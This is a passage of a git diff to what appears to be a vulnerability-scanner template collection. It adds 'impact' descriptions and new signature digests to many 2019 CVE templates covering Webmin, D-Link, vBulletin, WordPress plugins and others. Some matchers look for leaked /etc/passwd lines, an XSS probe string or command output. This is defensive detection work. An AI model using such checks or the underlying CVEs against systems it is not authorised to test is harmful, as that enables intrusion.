+    Successful exploitation of this vulnerability could allow an attacker to gain unauthorized access to sensitive information or perform unauthorized actions.
   remediation: Upgrade to 6.3.4 or higher.
   reference:
     - https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569
@@ -61,4 +63,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502202fe251ade1185e186bfea0aab6e8048c4d64c4b7f374d08a7541dc4908481741022100c2b32dca20826b89e2a173b2de47c1246b744965932400c4651cfbb6bae2777a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402202220e9abfa8f037f1a3d2108ea51deb47fdcd5bb291fd64476a835b2926d8978022062586481cc1b66f6efdf1887a567dfff4914576dfefe8d4902c797e9da7c597c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-15107.yaml b/http/cves/2019/CVE-2019-15107.yaml
index 18da575190..1cfb7d83d7 100644
--- a/http/cves/2019/CVE-2019-15107.yaml
+++ b/http/cves/2019/CVE-2019-15107.yaml
@@ -5,6 +5,8 @@ info:
   author: bp0lr
   severity: critical
   description: Webmin <=1.920. is vulnerable to an unauthenticated remote command execution via the parameter 'old' in password_change.cgi.
+  impact: |
+    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands with root privileges.
   remediation: |
     Upgrade to Webmin version 1.930 or later to mitigate this vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: regex
         regex:
           - "root:.*:0:0:"
-# digest: 4a0a00473045022100d6cd724892bd86629d0572a98aa41f443026faa5e0a8c89f96aa9a9e4b7aa3de0220038209fde2a226b2efea9003c9fba46b9ba1cb9678d4eb39c794ee4d8f966400:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022023ab33438b40d817e154e51a25c7fcea07b5c6e4eee1474a570fcc6de3b3196e02201f60a01c751d02dacc953244825b5e0d07dfb4c1639d65d9bb0125befff52156:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-15501.yaml b/http/cves/2019/CVE-2019-15501.yaml
index 4199c68896..cbbde31d75 100644
--- a/http/cves/2019/CVE-2019-15501.yaml
+++ b/http/cves/2019/CVE-2019-15501.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     L-Soft LISTSERV before 16.5-2018a contains a reflected cross-site scripting vulnerability via the /scripts/wa.exe OK parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.
   remediation: |
     Upgrade to a version of L-Soft LISTSERV that is higher than 16.5-2018a to mitigate the XSS vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502210089d7b8cda5c95d48e4e6233fc74d150ec1051fd333b95e5d42dd853c59cdc1be022056b7a170d038cb0ccf8964290248ec63ef896a710d8dfe53e78d643cc1f7fa72:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220270efd9c75be57743bca08be5dd58b7b222db2d18c4d91b51c4b119169af9bf502202afcee6e3016215a9b240db83add1f2b1d19e88c437b1841e30ae3de4a457371:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-15642.yaml b/http/cves/2019/CVE-2019-15642.yaml
index cd3a4efb1b..d3b05abedd 100644
--- a/http/cves/2019/CVE-2019-15642.yaml
+++ b/http/cves/2019/CVE-2019-15642.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     rpc.cgi in Webmin through 1.920 allows authenticated Remote Code Execution via a crafted object name because unserialise_variable makes an eval call. NOTE: the Webmin_Servers_Index documentation states "RPC can be used to run any command or modify any file on a server, which is why access to it must not be granted to un-trusted Webmin users."
+  impact: |
+    Successful exploitation of this vulnerability allows an authenticated attacker to execute arbitrary code on the target system.
   remediation: |
     Upgrade Webmin to version 1.920 or later to mitigate this vulnerability.
   reference:
@@ -79,4 +81,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100c19ef8bcb5380cb1993256eb238a964fb6f038ab5784a2a8ebb7c6928a51fa5b02204b3e5c3aed1548bbde40091f25c47ef6067938f912660a135481b3c001fcec24:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009ab986d457b7646183071f84ac923249c3f050707b58b1455177a6f46e7400d4022100b925068040570ebca1de0c32584939cba7c803a7fddd568f2346d497144d2552:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-15713.yaml b/http/cves/2019/CVE-2019-15713.yaml
index 2f140a3b4a..85673396a5 100644
--- a/http/cves/2019/CVE-2019-15713.yaml
+++ b/http/cves/2019/CVE-2019-15713.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo,dhiyaneshDk
   severity: medium
   description: WordPress plugin My Calendar <= 3.1.9 is susceptible to reflected cross-site scripting which can be triggered via unescaped usage of URL parameters in multiple locations throughout the site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Update to the latest version of the My Calendar plugin (>= 3.1.10) or apply the vendor-provided patch to fix the XSS vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220026b9497d13e36450163707bb99c53f8332a00e157f3f2a1195f4c03a469022d0220378653dc00aabc3422af65831d1d7500e7e0eaf270859a4b9a67f8d045bf4c58:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b02f976f427f8d2ef26a37638e90edf45bf07b90b811425576d4689fbb5e414b022100b1fb387163ad9105c9c02f9836369aaa5f34f13c8b04b70e08611d604545f549:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-15811.yaml b/http/cves/2019/CVE-2019-15811.yaml
index c62e2bb362..7bd35dcac8 100644
--- a/http/cves/2019/CVE-2019-15811.yaml
+++ b/http/cves/2019/CVE-2019-15811.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     DomainMOD through 4.13.0 contains a cross-site scripting vulnerability via /reporting/domains/cost-by-month.php in Daterange parameters.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Upgrade to the latest version of DomainMOD (>=4.13.1) to mitigate this vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
           - 'contains(body_2, "value=\"\"onfocus=\"alert(document.domain)\"autofocus=")'
           - 'contains(body_2, "DomainMOD")'
         condition: and
-# digest: 4b0a00483046022100d4fc45681884ac68535f26a2835633a8377ac0860a428aa5db641a95a6beb8920221008cc0a54f325dca02d217896d1185c23c7ec0cfdffb1ef708246bb2c4834f41af:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022070d1e7287d9422d4d2594c81b0436e78388ee4c16323014a30a266a21d98fae6022027bfae05196e722fe84c1cba88a3f367fb0ad89804a64d852994b15fec5a57fa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-15858.yaml b/http/cves/2019/CVE-2019-15858.yaml
index 1d5fbd2ae9..fec2177f00 100644
--- a/http/cves/2019/CVE-2019-15858.yaml
+++ b/http/cves/2019/CVE-2019-15858.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     WordPress Woody Ad Snippets prior to 2.2.5 is susceptible to cross-site scripting and remote code execution via admin/includes/class.import.snippet.php, which allows unauthenticated options import as demonstrated by storing a cross-site scripting payload for remote code execution.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access, data theft, and remote code execution.
   remediation: |
     Update to the latest version of the Woody Ad Snippets plugin (2.2.5) or apply the vendor-provided patch to mitigate the vulnerability.
   reference:
@@ -54,4 +56,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100c52af843f6514e4dbf14ea3fba8eece015b21f6fd5ae8b98cdac64ceb13e6622022100aee7c75bc7a52f887e96de597aafd044121ca55687a45cd74dca832e07dd9af3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022056684932aa11a2739528559b76c2e2990c66e33a49057032a153a36a2061c4ff022100f29a75d28791180a9bd50b338b24b78d87cf5ba78b5a99929abeaafee6a8a689:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-15859.yaml b/http/cves/2019/CVE-2019-15859.yaml
index 959d601870..45e1e8a98e 100644
--- a/http/cves/2019/CVE-2019-15859.yaml
+++ b/http/cves/2019/CVE-2019-15859.yaml
@@ -5,6 +5,8 @@ info:
   author: geeknik
   severity: critical
   description: Socomec DIRIS A-40 devices before 48250501 are susceptible to a password disclosure vulnerability in the web interface that could allow remote attackers to get full access to a device via the /password.jsn URI.
+  impact: |
+    An attacker can obtain sensitive information such as passwords, leading to unauthorized access.
   remediation: |
     Update the firmware of the Socomec DIRIS A-40 devices to the latest version to mitigate the vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a004830460221009c1484c7f52b164c98b1db3d356c06b767a98dab5075e51641ba7f8da35ba303022100ca640cf2e91c667d29807ef83c59449f08711f8e947399199b173395288f4149:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100fa162659f07aa416234b0f60cc848beb9f649930d67574dc8dbd627ca8bde2e602210092e84600755941871a4425496e4cc5b889c90f0c721e3a0b67a6b78dcc0153d7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-15889.yaml b/http/cves/2019/CVE-2019-15889.yaml
index 9bd413c935..f4352df685 100644
--- a/http/cves/2019/CVE-2019-15889.yaml
+++ b/http/cves/2019/CVE-2019-15889.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: WordPress Download Manager plugin before 2.9.94 contains a cross-site scripting vulnerability via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter.
+  impact: |
+    Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions.
   remediation: |
     Update WordPress Download Manager plugin to version 2.9.94 or later to mitigate this vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100b3fdc5d3d219f55d7238f8da362af342eb6144d85dc0b16fa97a9a141da81a11022100ce1b8bba6c81abcc43892434b7f27d19b7d2bd1d93016e372e52830e8baf7322:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201106f65892af2d34bc87ffd924cd7bb35dddf9505635acb3da4b98a8f80453d00221009b1b9fb622b92079f9acf16bc430c2262d0361560c15788061bef66a8414c62c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-16057.yaml b/http/cves/2019/CVE-2019-16057.yaml
index 7207284b41..30ccf13c49 100644
--- a/http/cves/2019/CVE-2019-16057.yaml
+++ b/http/cves/2019/CVE-2019-16057.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     The login_mgr.cgi script in D-Link DNS-320 through 2.05.B10 is vulnerable to remote command injection.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data loss, and potential compromise of the affected device.
   remediation: |
     Apply the latest firmware update provided by D-Link to mitigate this vulnerability.
   reference:
@@ -39,4 +41,4 @@ http:
           - status_code == 200
           - contains_all(body, "uid=", "gid=", "pwd&id")
         condition: and
-# digest: 4a0a00473045022100adb47c80be63a01a42f0ed741e95e659d430e61c5aefb1b8a0cb7591cdb8a0cd0220065bef18860950fb0fcac4d2d1f8e0cb2623e502a9faa1e1526adf5e31d69947:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402207d7ea221376d46df01ca0e045949160b31da607ad1fc36d4163f767decdec2e4022021575c0f789ed09b7aa7550c0739afc1440db9154e0b356c8d28e9d00af57827:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-16097.yaml b/http/cves/2019/CVE-2019-16097.yaml
index bc665c9e81..22cd956053 100644
--- a/http/cves/2019/CVE-2019-16097.yaml
+++ b/http/cves/2019/CVE-2019-16097.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: Harbor 1.7.0 through 1.8.2 is susceptible to privilege escalation via core/api/user.go, which allows allows non-admin users to create admin accounts via the POST /api/users API when Harbor is setup with DB as an authentication backend and allows user to do self-registration.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to escalate their privileges and gain unauthorized access to sensitive information.
   remediation: Upgrade to v1.7.6 v1.8.3. v.1.9.0 or higher. A potential workaround without applying the fix is to configure Harbor to use a non-DB authentication backend such as LDAP.
   reference:
     - https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/
@@ -51,4 +53,4 @@ http:
           - 201
           - 409
         condition: or
-# digest: 4b0a00483046022100deb320fddd7cd7e360af1d915a5e2b4a2031ba1c2b85a38df5fa7b21e58647d9022100cf24b1843a79ac69a9c21a308d977bc38762033dbb04ae4691b526031186dea4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022067edcb44f59109d912493930c63a676c8e6df028bb4f5b8496720809653be1d0022068657f1898e6f73733891cc8fdc9dda4a8e8d979c84dee292f370ed853b509e2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-16123.yaml b/http/cves/2019/CVE-2019-16123.yaml
index e70f4850c3..5644488f08 100644
--- a/http/cves/2019/CVE-2019-16123.yaml
+++ b/http/cves/2019/CVE-2019-16123.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     PilusCart versions 1.4.1 and prior suffer from a file disclosure vulnerability via local file inclusion.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and remote code execution.
   remediation: |
     Upgrade to a patched version of PilusCart (>=1.4.2) or apply the vendor-supplied patch to mitigate the LFI vulnerability.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502205a929da3ccef428e4de825f31e61dd312b16bfbe95152a97ae9bbbb6bd2a0d5002210097bc64eb50c6ff0963d6bea54ee69fe15ea4beeb49cf6826ce6341dc5437c49d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e6087d2767f0fac5252b40b47fdd7e59459cf380c05b4ea08bae6ef981934a5f022100d0d5621d96879472aa7cc1a5b6059df93004443c90ac60b0972da266b5cd1838:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-16278.yaml b/http/cves/2019/CVE-2019-16278.yaml
index 18c02ab007..0c3d0a7262 100644
--- a/http/cves/2019/CVE-2019-16278.yaml
+++ b/http/cves/2019/CVE-2019-16278.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: critical
   description: nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via  directory traversal in the function http_verify.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system.
   remediation: |
     Upgrade to a patched version of nostromo web server (1.9.7 or later) or apply the vendor-supplied patch.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: regex
         regex:
           - "root:.*:0:0:"
-# digest: 4a0a00473045022061d3b339f5c6612df17dbd010c6660331ed1e5a990d1dfe2593cb9aae042263b0221009bca51e9f96b88846c89600d64771aeb8e975ee9be5c3d535a70c9d6791a8851:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009197ea8583444290c16b743810bcb4847681baff51b30b7205f359adc573b361022100bbb59ccec01b7d534b38b667144b2dd3f5ea60c1143101796e7ab7ef55c74a36:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-16313.yaml b/http/cves/2019/CVE-2019-16313.yaml
index cf7bbde220..e810df30c6 100644
--- a/http/cves/2019/CVE-2019-16313.yaml
+++ b/http/cves/2019/CVE-2019-16313.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: high
   description: ifw8 Router ROM v4.31 is vulnerable to credential disclosure via action/usermanager.htm HTML source code.
+  impact: |
+    An attacker can exploit this vulnerability to discover sensitive credentials.
   remediation: |
     Update the ifw8 Router ROM to a version that is not affected by CVE-2019-16313.
   reference:
@@ -47,4 +49,4 @@ http:
         regex:
           - '<td class="pwd" data="([a-z]+)">\*\*\*\*\*\*<\/td>'
         part: body
-# digest: 4a0a00473045022100a41a55270783dc0b16e0d6303924e8884b0d33b3d1f60f6b17f6a980d80321710220566b7117447d92e65c4bb680f6812ea4996282d896e3bd550625f41b728f8b64:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d7512d99d4d4c1bb850feb7380ea7157d175e793e2f5f78b260e9c22ed68a4c002200e88a8c3cc9d34c3476e4c0ca0e31c5fb18be45c44a9624eaa83d867a583f4b6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-16332.yaml b/http/cves/2019/CVE-2019-16332.yaml
index de737abae6..6e60e634fd 100644
--- a/http/cves/2019/CVE-2019-16332.yaml
+++ b/http/cves/2019/CVE-2019-16332.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: WordPress API Bearer Auth plugin before 20190907 contains a cross-site scripting vulnerability. The server parameter is not correctly filtered in swagger-config.yaml.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.
   remediation: |
     Update to the latest version of WordPress API Bearer Auth plugin (20190907 or later) to mitigate the vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a004830460221008067c484e34d5ef7a2f1e621134c893f289f3f096cc795faf26d8a4bb5e8f31e022100eb4ec633bcdd81de0f07682bb841f74735f63d6b8895bd46df4d0bb67f045aea:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402205a90c2dce7b627ea4879af736ee71111af575ce28d7067638421e0cc23e923c50220546d88361b600fb12683814d459b623a554535ef390956f9be7cd597a9f717bd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-16525.yaml b/http/cves/2019/CVE-2019-16525.yaml
index 743a2b8a79..66d9996a3b 100644
--- a/http/cves/2019/CVE-2019-16525.yaml
+++ b/http/cves/2019/CVE-2019-16525.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: WordPress Checklist plugin before 1.1.9 contains a cross-site scripting vulnerability. The fill parameter is not correctly filtered in the checklist-icon.php file.
+  impact: |
+    Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.
   remediation: |
     Update to the latest version of the WordPress Checklist plugin (1.1.9 or higher) to mitigate this vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022053759d309bf11fcc679651d5f8cb2175005ca2c71da1e2e59be0a51cb21c8f9f022100fe97248173d1e59d095bc345da1f40be377b3c4d22709175e7af4ceba90dcee2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f6512c833ad433fe710ea27531aaeccc66e46433da55838e4e57270eaf091728022100d86e577bc941faa784fb92fda3c604ff675cb3ed98f02e3f4723b001b1acf81e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-1653.yaml b/http/cves/2019/CVE-2019-1653.yaml
index d1c5c47b7e..b44446be1e 100644
--- a/http/cves/2019/CVE-2019-1653.yaml
+++ b/http/cves/2019/CVE-2019-1653.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated remote attacker to retrieve sensitive information due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs. A successful exploit could allow the attacker to download the router configuration or detailed diagnostic information.
+  impact: |
+    An attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to further attacks.
   remediation: |
     Cisco has released firmware updates that address this vulnerability.
   reference:
@@ -43,4 +45,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100b8300af90bfc027fb950e27c179f5afb717c65898e445231c368b03172d564d5022053abdcd6d49f912c8cf1521cc0b313ebb2a648cb5125f4f324e660c62910d82f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100cb2e821e6bfdbdaa9e1bff496947f504ec4c28f43d3d7ac251c6f4ec12cc495302203eb1f16e0d17a3cb35e3f18bdde000ee171558b51985dd5592516328ea738838:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-16662.yaml b/http/cves/2019/CVE-2019-16662.yaml
index beecd5d4c0..27bc513444 100644
--- a/http/cves/2019/CVE-2019-16662.yaml
+++ b/http/cves/2019/CVE-2019-16662.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: critical
   description: rConfig 3.9.2 is susceptible to a remote code execution vulnerability. An attacker can directly execute system commands by sending a GET request to ajaxServerSettingsChk.php because the rootUname parameter is passed to the exec function without filtering, which can lead to command execution.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data theft, and complete compromise of the affected system.
   remediation: |
     Upgrade to a patched version of rConfig (3.9.3 or later) or apply the vendor-supplied patch to mitigate this vulnerability.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022038fa03ff08b131740f9e80cc113a4d16d7350845a81bda9c20b20ad98543fc8d02201e7e77d806f3531aebf69fb71b82c84e2006c8b8ba520021fdf799e290120cb1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402200f2839b95bc3e6aca31990dba187fe767c476d6fa38d96d8d7cbdfcb94ffa5ad02201ee800939c32170192859950ef6f3be66fd3e1b0002b8d2cdf589cf11753de88:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-16759.yaml b/http/cves/2019/CVE-2019-16759.yaml
index ab1bed184d..719e36e8cd 100644
--- a/http/cves/2019/CVE-2019-16759.yaml
+++ b/http/cves/2019/CVE-2019-16759.yaml
@@ -5,6 +5,8 @@ info:
   author: madrobot
   severity: critical
   description: vBulletin 5.0.0 through 5.5.4 is susceptible to a remote command execution vulnerability via the widgetConfig parameter in an ajax/render/widget_php routestring request. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the target system.
   remediation: |
     Upgrade vBulletin to a version that is not affected by CVE-2019-16759.
   reference:
@@ -46,5 +48,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4b0a0048304602210099cb13abd88874a8b2f03ab11488fab65eb35648f5c9c009b80ca1fa42dba748022100e308279142d547bc5a5de4b2f603f7a6b524b3143ce7c3b8b7a370720445e250:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502203e74a3201aabfc4ff585060e8e78878773aa01e2e8fdc5dee75bda9d4d97c2e8022100a6d3d06853a6a853bfd6dfc31a55fbd59a64fe694097e23343beee51d349e7a7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-16920.yaml b/http/cves/2019/CVE-2019-16920.yaml
index b5e9349072..a24916a7c8 100644
--- a/http/cves/2019/CVE-2019-16920.yaml
+++ b/http/cves/2019/CVE-2019-16920.yaml
@@ -5,6 +5,8 @@ info:
   author: dwisiswant0
   severity: critical
   description: D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565 contain an unauthenticated remote code execution vulnerability. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these issues also affected; DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected router, potentially leading to complete compromise of the device and the network it is connected to.
   remediation: |
     Apply the latest firmware update provided by D-Link to mitigate this vulnerability.
   reference:
@@ -65,4 +67,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100b560abf2671b432e68d086b48701629f7dfc31753dfffc7bb1375a780eeb4f990220145685f62028618ff2d1c7e6ee8533580cd6a3872451fb397b979ada1717dffc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022003773e304ab91df71f900021454fce3f2c0593fc15f2dcece99dc83ff5aef16a02200dd86f340291b226dfda814eddb74eb078e33de8dc13e00f33b886d7fac70254:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-16931.yaml b/http/cves/2019/CVE-2019-16931.yaml
index 0a3f64dc7c..9112c3efa1 100644
--- a/http/cves/2019/CVE-2019-16931.yaml
+++ b/http/cves/2019/CVE-2019-16931.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Visualizer plugin before 3.3.1 contains a stored cross-site scripting vulnerability via /wp-json/visualizer/v1/update-chart WP-JSON API endpoint. An unauthenticated attacker can execute arbitrary JavaScript when an admin or other privileged user edits the chart via the admin dashboard.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Update to the latest version of WordPress Visualizer plugin (3.3.1) or apply the provided patch to fix the XSS vulnerability.
   reference:
@@ -54,4 +56,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450220797993498db8d0ade2cea7d743e50b35c7140b306fb68e95758de6a9417ff585022100d0eb57b221c527bafcb1b17700031a859165d6ddb643a9dbb0f0db529215cff5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220260fb552ca6851c2940116491eee4e3b2cbea340f2a1a59af3232fb6161ce0aa022100dfb085080667e0bf3b2a5fb6386d4483d048978809375552fcb1d8b7b197b171:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-16932.yaml b/http/cves/2019/CVE-2019-16932.yaml
index df581f5008..7b5f53364c 100644
--- a/http/cves/2019/CVE-2019-16932.yaml
+++ b/http/cves/2019/CVE-2019-16932.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Visualizer prior to 3.3.1 suffers from a blind server-side request forgery vulnerability via the /wp-json/visualizer/v1/upload-data endpoint.
+  impact: |
+    An attacker can exploit this vulnerability to send crafted requests to internal resources, potentially leading to unauthorized access or data leakage.
   remediation: |
     Update Visualizer plugin to version 3.3.1 or later to fix the SSRF vulnerability.
   reference:
@@ -55,4 +57,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100eaac53b5f53c42566ca9ed361c1f156a4b314f32bd7953840057cf34ba129ff5022100bce0b7d02079de61b12921e7879738546bb92ef9f7695d8186100e0f028236d0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210082132d76e2351c5eef71e133fa7500cefbfc5eccac4dec98c722b37203b76fd102205cddea05ae07cfe700cb34535408a07facaa147aa4b6545c0ada53b4628ba8a2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-16996.yaml b/http/cves/2019/CVE-2019-16996.yaml
index 4c9e918691..2dd84dec27 100644
--- a/http/cves/2019/CVE-2019-16996.yaml
+++ b/http/cves/2019/CVE-2019-16996.yaml
@@ -5,6 +5,8 @@ info:
   author: ritikchaddha
   severity: high
   description: Metinfo 7.0.0 beta is susceptible to SQL Injection in app/system/product/admin/product_admin.class.php via the admin/?n=product&c=product_admin&a=dopara&app_type=shop id parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Upgrade to a patched version of Metinfo or apply the necessary security patches to mitigate the SQL Injection vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100fb28a127d371548fae149feb40aa31ecc88cac7f9e607af64606e54763fa1dcc022045774ed79c5ad1f2d8d89bc90cb0b7b4f8ab827d7afebab1be81dcd91bacf890:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100fc04804fdaac43716c01a61674ffb0cad9127e1c76c62a462f57cc9b63e06c58022100b4ed30e35f1ddc79b8340a906c676236e582f740a31bb038ae23468545572b3a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-16997.yaml b/http/cves/2019/CVE-2019-16997.yaml
index 68934e1e02..8c7de1ecdb 100644
--- a/http/cves/2019/CVE-2019-16997.yaml
+++ b/http/cves/2019/CVE-2019-16997.yaml
@@ -5,6 +5,8 @@ info:
   author: ritikchaddha
   severity: high
   description: Metinfo 7.0.0 beta is susceptible to SQL Injection in app/system/language/admin/language_general.class.php via the admin/?n=language&c=language_general&a=doExportPack appno parameter.
+  impact: |
